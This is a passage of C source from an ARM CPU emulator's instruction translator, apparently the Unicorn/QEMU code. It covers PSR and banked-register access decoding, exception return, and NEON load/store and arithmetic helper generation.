*/ if (IS_USER(s)) { mask &= CPSR_USER; } return mask; } /* Returns nonzero if access to the PSR is not permitted. Marks t0 as dead. */ static int gen_set_psr(DisasContext *s, uint32_t mask, int spsr, TCGv_i32 t0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (spsr) { /* ??? This is also undefined in system mode. */ if (IS_USER(s)) return 1; tmp = load_cpu_field(tcg_ctx, spsr); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, ~mask); tcg_gen_andi_i32(tcg_ctx, t0, t0, mask); tcg_gen_or_i32(tcg_ctx, tmp, tmp, t0); store_cpu_field(tcg_ctx, tmp, spsr); } else { gen_set_cpsr(tcg_ctx, t0, mask); } tcg_temp_free_i32(tcg_ctx, t0); gen_lookup_tb(s); return 0; } /* Returns nonzero if access to the PSR is not permitted. */ static int gen_set_psr_im(DisasContext *s, uint32_t mask, int spsr, uint32_t val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, val); return gen_set_psr(s, mask, spsr, tmp); } static bool msr_banked_access_decode(DisasContext *s, int r, int sysm, int rn, int *tgtmode, int *regno) { /* Decode the r and sysm fields of MSR/MRS banked accesses into * the target mode and register number, and identify the various * unpredictable cases. * MSR (banked) and MRS (banked) are CONSTRAINED UNPREDICTABLE if: * + executed in user mode * + using R15 as the src/dest register * + accessing an unimplemented register * + accessing a register that's inaccessible at current PL/security state* * + accessing a register that you could access with a different insn * We choose to UNDEF in all these cases. * Since we don't know which of the various AArch32 modes we are in * we have to defer some checks to runtime. * Accesses to Monitor mode registers from Secure EL1 (which implies * that EL3 is AArch64) must trap to EL3. * * If the access checks fail this function will emit code to take * an exception and return false. Otherwise it will return true, * and set *tgtmode and *regno appropriately. */ int exc_target = default_exception_el(s); /* These instructions are present only in ARMv8, or in ARMv7 with the * Virtualization Extensions. */ if (!arm_dc_feature(s, ARM_FEATURE_V8) && !arm_dc_feature(s, ARM_FEATURE_EL2)) { goto undef; } if (IS_USER(s) || rn == 15) { goto undef; } /* The table in the v8 ARM ARM section F5.2.3 describes the encoding * of registers into (r, sysm). */ if (r) { /* SPSRs for other modes */ switch (sysm) { case 0xe: /* SPSR_fiq */ *tgtmode = ARM_CPU_MODE_FIQ; break; case 0x10: /* SPSR_irq */ *tgtmode = ARM_CPU_MODE_IRQ; break; case 0x12: /* SPSR_svc */ *tgtmode = ARM_CPU_MODE_SVC; break; case 0x14: /* SPSR_abt */ *tgtmode = ARM_CPU_MODE_ABT; break; case 0x16: /* SPSR_und */ *tgtmode = ARM_CPU_MODE_UND; break; case 0x1c: /* SPSR_mon */ *tgtmode = ARM_CPU_MODE_MON; break; case 0x1e: /* SPSR_hyp */ *tgtmode = ARM_CPU_MODE_HYP; break; default: /* unallocated */ goto undef; } /* We arbitrarily assign SPSR a register number of 16. */ *regno = 16; } else { /* general purpose registers for other modes */ switch (sysm) { case 0x0: /* 0b00xxx : r8_usr ... r14_usr */ case 0x1: /* 0b00xxx : r8_usr ... r14_usr */ case 0x2: /* 0b00xxx : r8_usr ... r14_usr */ case 0x3: /* 0b00xxx : r8_usr ... r14_usr */ case 0x4: /* 0b00xxx : r8_usr ... r14_usr */ case 0x5: /* 0b00xxx : r8_usr ... r14_usr */ case 0x6: /* 0b00xxx : r8_usr ... r14_usr */ *tgtmode = ARM_CPU_MODE_USR; *regno = sysm + 8; break; case 0x8: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0x9: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xa: /* 0b01xxx : r8_fiq ... 
r14_fiq */ case 0xb: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xc: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xd: /* 0b01xxx : r8_fiq ... r14_fiq */ case 0xe: /* 0b01xxx : r8_fiq ... r14_fiq */ *tgtmode = ARM_CPU_MODE_FIQ; *regno = sysm; break; case 0x10: /* 0b1000x : r14_irq, r13_irq */ case 0x11: /* 0b1000x : r14_irq, r13_irq */ *tgtmode = ARM_CPU_MODE_IRQ; *regno = sysm & 1 ? 13 : 14; break; case 0x12: /* 0b1001x : r14_svc, r13_svc */ case 0x13: /* 0b1001x : r14_svc, r13_svc */ *tgtmode = ARM_CPU_MODE_SVC; *regno = sysm & 1 ? 13 : 14; break; case 0x14: /* 0b1010x : r14_abt, r13_abt */ case 0x15: /* 0b1010x : r14_abt, r13_abt */ *tgtmode = ARM_CPU_MODE_ABT; *regno = sysm & 1 ? 13 : 14; break; case 0x16: /* 0b1011x : r14_und, r13_und */ case 0x17: /* 0b1011x : r14_und, r13_und */ *tgtmode = ARM_CPU_MODE_UND; *regno = sysm & 1 ? 13 : 14; break; case 0x1c: /* 0b1110x : r14_mon, r13_mon */ case 0x1d: /* 0b1110x : r14_mon, r13_mon */ *tgtmode = ARM_CPU_MODE_MON; *regno = sysm & 1 ? 13 : 14; break; case 0x1e: /* 0b1111x : elr_hyp, r13_hyp */ case 0x1f: /* 0b1111x : elr_hyp, r13_hyp */ *tgtmode = ARM_CPU_MODE_HYP; /* Arbitrarily pick 17 for ELR_Hyp (which is not a banked LR!) */ *regno = sysm & 1 ? 13 : 17; break; default: /* unallocated */ goto undef; } } /* Catch the 'accessing inaccessible register' cases we can detect * at translate time. */ switch (*tgtmode) { case ARM_CPU_MODE_MON: if (!arm_dc_feature(s, ARM_FEATURE_EL3) || s->ns) { goto undef; } if (s->current_el == 1) { /* If we're in Secure EL1 (which implies that EL3 is AArch64) * then accesses to Mon registers trap to EL3 */ exc_target = 3; goto undef; } break; case ARM_CPU_MODE_HYP: /* * SPSR_hyp and r13_hyp can only be accessed from Monitor mode * (and so we can forbid accesses from EL2 or below). elr_hyp * can be accessed also from Hyp mode, so forbid accesses from * EL0 or EL1. 
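 * Concretely, the check below requires the EL2 feature, rejects
 * EL0/EL1 entirely, and from EL2 itself permits only ELR_Hyp
 * (regno 17); EL3 may access all three registers.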
*/ if (!arm_dc_feature(s, ARM_FEATURE_EL2) || s->current_el < 2 || (s->current_el < 3 && *regno != 17)) { goto undef; } break; default: break; } return true; undef: /* If we get here then some access check did not pass */ gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), exc_target); return false; } static void gen_msr_banked(DisasContext *s, int r, int sysm, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_reg, tcg_tgtmode, tcg_regno; int tgtmode = 0, regno = 0; if (!msr_banked_access_decode(s, r, sysm, rn, &tgtmode, ®no)) { return; } /* Sync state because msr_banked() can raise exceptions */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_reg = load_reg(s, rn); tcg_tgtmode = tcg_const_i32(tcg_ctx, tgtmode); tcg_regno = tcg_const_i32(tcg_ctx, regno); gen_helper_msr_banked(tcg_ctx, tcg_ctx->cpu_env, tcg_reg, tcg_tgtmode, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_tgtmode); tcg_temp_free_i32(tcg_ctx, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_reg); s->base.is_jmp = DISAS_UPDATE; } static void gen_mrs_banked(DisasContext *s, int r, int sysm, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_reg, tcg_tgtmode, tcg_regno; int tgtmode = 0, regno = 0; if (!msr_banked_access_decode(s, r, sysm, rn, &tgtmode, ®no)) { return; } /* Sync state because mrs_banked() can raise exceptions */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_reg = tcg_temp_new_i32(tcg_ctx); tcg_tgtmode = tcg_const_i32(tcg_ctx, tgtmode); tcg_regno = tcg_const_i32(tcg_ctx, regno); gen_helper_mrs_banked(tcg_ctx, tcg_reg, tcg_ctx->cpu_env, tcg_tgtmode, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_tgtmode); tcg_temp_free_i32(tcg_ctx, tcg_regno); store_reg(s, rn, tcg_reg); s->base.is_jmp = DISAS_UPDATE; } /* Store value to PC as for an exception return (ie don't * mask bits). The subsequent call to gen_helper_cpsr_write_eret() * will do the masking based on the new value of the Thumb bit. */ static void store_pc_exc_ret(DisasContext *s, TCGv_i32 pc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[15], pc); tcg_temp_free_i32(tcg_ctx, pc); } /* Generate a v6 exception return. Marks both values as dead. */ static void gen_rfe(DisasContext *s, TCGv_i32 pc, TCGv_i32 cpsr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_pc_exc_ret(s, pc); /* The cpsr_write_eret helper will mask the low bits of PC * appropriately depending on the new Thumb bit, so it must * be called after storing the new PC. */ if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { // gen_io_start(tcg_ctx); } gen_helper_cpsr_write_eret(tcg_ctx, tcg_ctx->cpu_env, cpsr); tcg_temp_free_i32(tcg_ctx, cpsr); /* Must exit loop to check un-masked IRQs */ s->base.is_jmp = DISAS_EXIT; } /* Generate an old-style exception return. Marks pc as dead. 
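 * "Old-style" means the pre-v6 form (e.g. a flag-setting data
 * processing op with PC as destination, such as MOVS pc, lr): the
 * current mode's SPSR is copied back into the CPSR, which gen_rfe()
 * performs via the cpsr_write_eret helper.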
*/ static void gen_exception_return(DisasContext *s, TCGv_i32 pc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_rfe(s, pc, load_cpu_field(tcg_ctx, spsr)); } #define CPU_V001 tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1 static inline void gen_neon_add(TCGContext *tcg_ctx, int size, TCGv_i32 t0, TCGv_i32 t1) { switch (size) { case 0: gen_helper_neon_add_u8(tcg_ctx, t0, t0, t1); break; case 1: gen_helper_neon_add_u16(tcg_ctx, t0, t0, t1); break; case 2: tcg_gen_add_i32(tcg_ctx, t0, t0, t1); break; default: abort(); } } static inline void gen_neon_rsb(TCGContext *tcg_ctx, int size, TCGv_i32 t0, TCGv_i32 t1) { switch (size) { case 0: gen_helper_neon_sub_u8(tcg_ctx, t0, t1, t0); break; case 1: gen_helper_neon_sub_u16(tcg_ctx, t0, t1, t0); break; case 2: tcg_gen_sub_i32(tcg_ctx, t0, t1, t0); break; default: return; } } /* 32-bit pairwise ops end up the same as the elementwise versions. */ #define gen_helper_neon_pmax_s32 tcg_gen_smax_i32 #define gen_helper_neon_pmax_u32 tcg_gen_umax_i32 #define gen_helper_neon_pmin_s32 tcg_gen_smin_i32 #define gen_helper_neon_pmin_u32 tcg_gen_umin_i32 #define GEN_NEON_INTEGER_OP_ENV(name) do { \ switch ((size << 1) | u) { \ case 0: \ gen_helper_neon_##name##_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 1: \ gen_helper_neon_##name##_u8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 2: \ gen_helper_neon_##name##_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 3: \ gen_helper_neon_##name##_u16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 4: \ gen_helper_neon_##name##_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ case 5: \ gen_helper_neon_##name##_u32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ break; \ default: return 1; \ }} while (0) #define GEN_NEON_INTEGER_OP(name) do { \ switch ((size << 1) | u) { \ case 0: \ gen_helper_neon_##name##_s8(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 1: \ gen_helper_neon_##name##_u8(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 2: \ gen_helper_neon_##name##_s16(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 3: \ gen_helper_neon_##name##_u16(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 4: \ gen_helper_neon_##name##_s32(tcg_ctx, tmp, tmp, tmp2); \ break; \ case 5: \ gen_helper_neon_##name##_u32(tcg_ctx, tmp, tmp, tmp2); \ break; \ default: return 1; \ }} while (0) static TCGv_i32 neon_load_scratch(TCGContext *tcg_ctx, int scratch) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch])); return tmp; } static void neon_store_scratch(TCGContext *tcg_ctx, int scratch, TCGv_i32 var) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch])); tcg_temp_free_i32(tcg_ctx, var); } static inline TCGv_i32 neon_get_scalar(TCGContext *tcg_ctx, int size, int reg) { TCGv_i32 tmp; if (size == 1) { tmp = neon_load_reg(tcg_ctx, reg & 7, reg >> 4); if (reg & 8) { gen_neon_dup_high16(tcg_ctx, tmp); } else { gen_neon_dup_low16(tcg_ctx, tmp); } } else { tmp = neon_load_reg(tcg_ctx, reg & 15, reg >> 4); } return tmp; } static int gen_neon_unzip(TCGContext *tcg_ctx, int rd, int rm, int size, int q) { TCGv_ptr pd, pm; if (!q && size == 2) { return 1; } pd = vfp_reg_ptr(tcg_ctx, true, rd); pm = vfp_reg_ptr(tcg_ctx, true, rm); if (q) { switch (size) { case 0: gen_helper_neon_qunzip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_qunzip16(tcg_ctx, pd, pm); break; case 2: gen_helper_neon_qunzip32(tcg_ctx, pd, pm); break; default: abort(); } } else { switch (size) { case 0: 
gen_helper_neon_unzip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_unzip16(tcg_ctx, pd, pm); break; default: abort(); } } tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, pm); return 0; } static int gen_neon_zip(TCGContext *tcg_ctx, int rd, int rm, int size, int q) { TCGv_ptr pd, pm; if (!q && size == 2) { return 1; } pd = vfp_reg_ptr(tcg_ctx, true, rd); pm = vfp_reg_ptr(tcg_ctx, true, rm); if (q) { switch (size) { case 0: gen_helper_neon_qzip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_qzip16(tcg_ctx, pd, pm); break; case 2: gen_helper_neon_qzip32(tcg_ctx, pd, pm); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_zip8(tcg_ctx, pd, pm); break; case 1: gen_helper_neon_zip16(tcg_ctx, pd, pm); break; default: abort(); } } tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, pm); return 0; } static void gen_neon_trn_u8(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 rd, tmp; rd = tcg_temp_new_i32(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, rd, t0, 8); tcg_gen_andi_i32(tcg_ctx, rd, rd, 0xff00ff00); tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0x00ff00ff); tcg_gen_or_i32(tcg_ctx, rd, rd, tmp); tcg_gen_shri_i32(tcg_ctx, t1, t1, 8); tcg_gen_andi_i32(tcg_ctx, t1, t1, 0x00ff00ff); tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xff00ff00); tcg_gen_or_i32(tcg_ctx, t1, t1, tmp); tcg_gen_mov_i32(tcg_ctx, t0, rd); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, rd); } static void gen_neon_trn_u16(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 rd, tmp; rd = tcg_temp_new_i32(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, rd, t0, 16); tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0xffff); tcg_gen_or_i32(tcg_ctx, rd, rd, tmp); tcg_gen_shri_i32(tcg_ctx, t1, t1, 16); tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xffff0000); tcg_gen_or_i32(tcg_ctx, t1, t1, tmp); tcg_gen_mov_i32(tcg_ctx, t0, rd); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, rd); } static struct { int nregs; int interleave; int spacing; } const neon_ls_element_type[11] = { {1, 4, 1}, {1, 4, 2}, {4, 1, 1}, {2, 2, 2}, {1, 3, 1}, {1, 3, 2}, {3, 1, 1}, {1, 1, 1}, {1, 2, 1}, {1, 2, 2}, {2, 1, 1} }; /* Translate a NEON load/store element instruction. Return nonzero if the instruction is invalid. */ static int disas_neon_ls_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd, rn, rm; int op; int nregs; int interleave; int spacing; int stride; int size; int reg; int load; int n; int vec_size; int mmu_idx; MemOp endian; TCGv_i32 addr; TCGv_i32 tmp; TCGv_i32 tmp2; TCGv_i64 tmp64; /* FIXME: this access check should not take precedence over UNDEF * for invalid encodings; we will generate incorrect syndrome information * for attempts to execute invalid vfp/neon encodings with FP disabled. */ if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) return 1; VFP_DREG_D(rd, insn); rn = (insn >> 16) & 0xf; rm = insn & 0xf; load = (insn & (1 << 21)) != 0; endian = s->be_data; mmu_idx = get_mem_index(s); if ((insn & (1 << 23)) == 0) { /* Load store all elements. 
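 * This is the VLDn/VSTn "multiple structures" form: the op field
 * indexes neon_ls_element_type[] above for the register count,
 * interleave factor and register spacing; e.g. op == 7 ({1, 1, 1})
 * is a plain one-register VLD1/VST1.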
*/ op = (insn >> 8) & 0xf; size = (insn >> 6) & 3; if (op > 10) return 1; /* Catch UNDEF cases for bad values of align field */ switch (op & 0xc) { case 4: if (((insn >> 5) & 1) == 1) { return 1; } break; case 8: if (((insn >> 4) & 3) == 3) { return 1; } break; default: break; } nregs = neon_ls_element_type[op].nregs; interleave = neon_ls_element_type[op].interleave; spacing = neon_ls_element_type[op].spacing; if (size == 3 && (interleave | spacing) != 1) { return 1; } /* For our purposes, bytes are always little-endian. */ if (size == 0) { endian = MO_LE; } /* Consecutive little-endian elements from a single register * can be promoted to a larger little-endian operation. */ if (interleave == 1 && endian == MO_LE) { size = 3; } tmp64 = tcg_temp_new_i64(tcg_ctx); addr = tcg_temp_new_i32(tcg_ctx); tmp2 = tcg_const_i32(tcg_ctx, 1 << size); load_reg_var(s, addr, rn); for (reg = 0; reg < nregs; reg++) { for (n = 0; n < 8 >> size; n++) { int xs; for (xs = 0; xs < interleave; xs++) { int tt = rd + reg + spacing * xs; if (load) { gen_aa32_ld_i64(s, tmp64, addr, mmu_idx, endian | size); neon_store_element64(tcg_ctx, tt, n, size, tmp64); } else { neon_load_element64(tcg_ctx, tmp64, tt, n, size); gen_aa32_st_i64(s, tmp64, addr, mmu_idx, endian | size); } tcg_gen_add_i32(tcg_ctx, addr, addr, tmp2); } } } tcg_temp_free_i32(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i64(tcg_ctx, tmp64); stride = nregs * interleave * 8; } else { size = (insn >> 10) & 3; if (size == 3) { /* Load single element to all lanes. */ int a = (insn >> 4) & 1; if (!load) { return 1; } size = (insn >> 6) & 3; nregs = ((insn >> 8) & 3) + 1; if (size == 3) { if (nregs != 4 || a == 0) { return 1; } /* For VLD4 size==3 a == 1 means 32 bits at 16 byte alignment */ size = 2; } if (nregs == 1 && a == 1 && size == 0) { return 1; } if (nregs == 3 && a == 1) { return 1; } addr = tcg_temp_new_i32(tcg_ctx); load_reg_var(s, addr, rn); /* VLD1 to all lanes: bit 5 indicates how many Dregs to write. * VLD2/3/4 to all lanes: bit 5 indicates register stride. */ stride = (insn & (1 << 5)) ? 2 : 1; vec_size = nregs == 1 ? stride * 8 : 8; tmp = tcg_temp_new_i32(tcg_ctx); for (reg = 0; reg < nregs; reg++) { gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), s->be_data | size); if ((rd & 1) && vec_size == 16) { /* We cannot write 16 bytes at once because the * destination is unaligned. */ tcg_gen_gvec_dup_i32(tcg_ctx, size, neon_reg_offset(rd, 0), 8, 8, tmp); tcg_gen_gvec_mov(tcg_ctx, 0, neon_reg_offset(rd + 1, 0), neon_reg_offset(rd, 0), 8, 8); } else { tcg_gen_gvec_dup_i32(tcg_ctx, size, neon_reg_offset(rd, 0), vec_size, vec_size, tmp); } tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); rd += stride; } tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); stride = (1 << size) * nregs; } else { /* Single element. */ int idx = (insn >> 4) & 0xf; int reg_idx; switch (size) { case 0: reg_idx = (insn >> 5) & 7; stride = 1; break; case 1: reg_idx = (insn >> 6) & 3; stride = (insn & (1 << 5)) ? 2 : 1; break; case 2: reg_idx = (insn >> 7) & 1; stride = (insn & (1 << 6)) ? 2 : 1; break; default: abort(); } nregs = ((insn >> 8) & 3) + 1; /* Catch the UNDEF cases. This is unavoidably a bit messy. 
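 * Which index and alignment bits must be zero depends on both the
 * element size and the register count, so each nregs case below
 * checks its own reserved combinations and returns 1 (UNDEF) when
 * one is set.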
*/ switch (nregs) { case 1: if (((idx & (1 << size)) != 0) || (size == 2 && ((idx & 3) == 1 || (idx & 3) == 2))) { return 1; } break; case 3: if ((idx & 1) != 0) { return 1; } /* fall through */ case 2: if (size == 2 && (idx & 2) != 0) { return 1; } break; case 4: if ((size == 2) && ((idx & 3) == 3)) { return 1; } break; default: abort(); } if ((rd + stride * (nregs - 1)) > 31) { /* Attempts to write off the end of the register file * are UNPREDICTABLE; we choose to UNDEF because otherwise * the neon_load_reg() would write off the end of the array. */ return 1; } tmp = tcg_temp_new_i32(tcg_ctx); addr = tcg_temp_new_i32(tcg_ctx); load_reg_var(s, addr, rn); for (reg = 0; reg < nregs; reg++) { if (load) { gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), s->be_data | size); neon_store_element(tcg_ctx, rd, reg_idx, size, tmp); } else { /* Store */ neon_load_element(tcg_ctx, tmp, rd, reg_idx, size); gen_aa32_st_i32(s, tmp, addr, get_mem_index(s), s->be_data | size); } rd += stride; tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); } tcg_temp_free_i32(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, tmp); stride = nregs * (1 << size); } } if (rm != 15) { TCGv_i32 base; base = load_reg(s, rn); if (rm == 13) { tcg_gen_addi_i32(tcg_ctx, base, base, stride); } else { TCGv_i32 index; index = load_reg(s, rm); tcg_gen_add_i32(tcg_ctx, base, base, index); tcg_temp_free_i32(tcg_ctx, index); } store_reg(s, rn, base); } return 0; } static inline void gen_neon_narrow(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_narrow_u8(tcg_ctx, dest, src); break; case 1: gen_helper_neon_narrow_u16(tcg_ctx, dest, src); break; case 2: tcg_gen_extrl_i64_i32(tcg_ctx, dest, src); break; default: abort(); } } static inline void gen_neon_narrow_sats(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_narrow_sat_s8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 1: gen_helper_neon_narrow_sat_s16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 2: gen_helper_neon_narrow_sat_s32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; default: abort(); } } static inline void gen_neon_narrow_satu(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_narrow_sat_u8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 1: gen_helper_neon_narrow_sat_u16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 2: gen_helper_neon_narrow_sat_u32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; default: abort(); } } static inline void gen_neon_unarrow_sats(TCGContext *tcg_ctx, int size, TCGv_i32 dest, TCGv_i64 src) { switch (size) { case 0: gen_helper_neon_unarrow_sat8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 1: gen_helper_neon_unarrow_sat16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; case 2: gen_helper_neon_unarrow_sat32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; default: abort(); } } static inline void gen_neon_shift_narrow(TCGContext *tcg_ctx, int size, TCGv_i32 var, TCGv_i32 shift, int q, int u) { if (q) { if (u) { switch (size) { case 1: gen_helper_neon_rshl_u16(tcg_ctx, var, var, shift); break; case 2: gen_helper_neon_rshl_u32(tcg_ctx, var, var, shift); break; default: abort(); } } else { switch (size) { case 1: gen_helper_neon_rshl_s16(tcg_ctx, var, var, shift); break; case 2: gen_helper_neon_rshl_s32(tcg_ctx, var, var, shift); break; default: abort(); } } } else { if (u) { switch (size) { case 1: gen_helper_neon_shl_u16(tcg_ctx, var, var, shift); break; case 2: gen_ushl_i32(tcg_ctx, var, 
var, shift); break; default: abort(); } } else { switch (size) { case 1: gen_helper_neon_shl_s16(tcg_ctx, var, var, shift); break; case 2: gen_sshl_i32(tcg_ctx, var, var, shift); break; default: abort(); } } } } static inline void gen_neon_widen(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 src, int size, int u) { if (u) { switch (size) { case 0: gen_helper_neon_widen_u8(tcg_ctx, dest, src); break; case 1: gen_helper_neon_widen_u16(tcg_ctx, dest, src); break; case 2: tcg_gen_extu_i32_i64(tcg_ctx, dest, src); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_widen_s8(tcg_ctx, dest, src); break; case 1: gen_helper_neon_widen_s16(tcg_ctx, dest, src); break; case 2: tcg_gen_ext_i32_i64(tcg_ctx, dest, src); break; default: abort(); } } tcg_temp_free_i32(tcg_ctx, src); } static inline void gen_neon_addl(TCGContext *tcg_ctx, int size) { switch (size) { case 0: gen_helper_neon_addl_u16(tcg_ctx, CPU_V001); break; case 1: gen_helper_neon_addl_u32(tcg_ctx, CPU_V001); break; case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; default: abort(); } } static inline void gen_neon_subl(TCGContext *tcg_ctx, int size) { switch (size) { case 0: gen_helper_neon_subl_u16(tcg_ctx, CPU_V001); break; case 1: gen_helper_neon_subl_u32(tcg_ctx, CPU_V001); break; case 2: tcg_gen_sub_i64(tcg_ctx, CPU_V001); break; default: abort(); } } static inline void gen_neon_negl(TCGContext *tcg_ctx, TCGv_i64 var, int size) { switch (size) { case 0: gen_helper_neon_negl_u16(tcg_ctx, var, var); break; case 1: gen_helper_neon_negl_u32(tcg_ctx, var, var); break; case 2: tcg_gen_neg_i64(tcg_ctx, var, var); break; default: abort(); } } static inline void gen_neon_addl_saturate(TCGContext *tcg_ctx, TCGv_i64 op0, TCGv_i64 op1, int size) { switch (size) { case 1: gen_helper_neon_addl_saturate_s32(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break; case 2: gen_helper_neon_addl_saturate_s64(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break; default: abort(); } } static inline void gen_neon_mull(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 a, TCGv_i32 b, int size, int u) { TCGv_i64 tmp; switch ((size << 1) | u) { case 0: gen_helper_neon_mull_s8(tcg_ctx, dest, a, b); break; case 1: gen_helper_neon_mull_u8(tcg_ctx, dest, a, b); break; case 2: gen_helper_neon_mull_s16(tcg_ctx, dest, a, b); break; case 3: gen_helper_neon_mull_u16(tcg_ctx, dest, a, b); break; case 4: tmp = gen_muls_i64_i32(tcg_ctx, a, b); tcg_gen_mov_i64(tcg_ctx, dest, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; case 5: tmp = gen_mulu_i64_i32(tcg_ctx, a, b); tcg_gen_mov_i64(tcg_ctx, dest, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; default: abort(); } /* gen_helper_neon_mull_[su]{8|16} do not free their parameters. Don't forget to clean them now. */ if (size < 2) { tcg_temp_free_i32(tcg_ctx, a); tcg_temp_free_i32(tcg_ctx, b); } } static void gen_neon_narrow_op(TCGContext *tcg_ctx, int op, int u, int size, TCGv_i32 dest, TCGv_i64 src) { if (op) { if (u) { gen_neon_unarrow_sats(tcg_ctx, size, dest, src); } else { gen_neon_narrow(tcg_ctx, size, dest, src); } } else { if (u) { gen_neon_narrow_satu(tcg_ctx, size, dest, src); } else { gen_neon_narrow_sats(tcg_ctx, size, dest, src); } } } /* Symbolic constants for op fields for Neon 3-register same-length. * The values correspond to bits [11:8,4]; see the ARM ARM DDI0406B * table A7-9. 
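 * op is assembled as ((insn >> 7) & 0x1e) | ((insn >> 4) & 1); e.g. NEON_3R_VADD_VSUB
 * == 16 == 0b10000 corresponds to insn bits [11:8] == 0b1000 with bit [4] clear.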
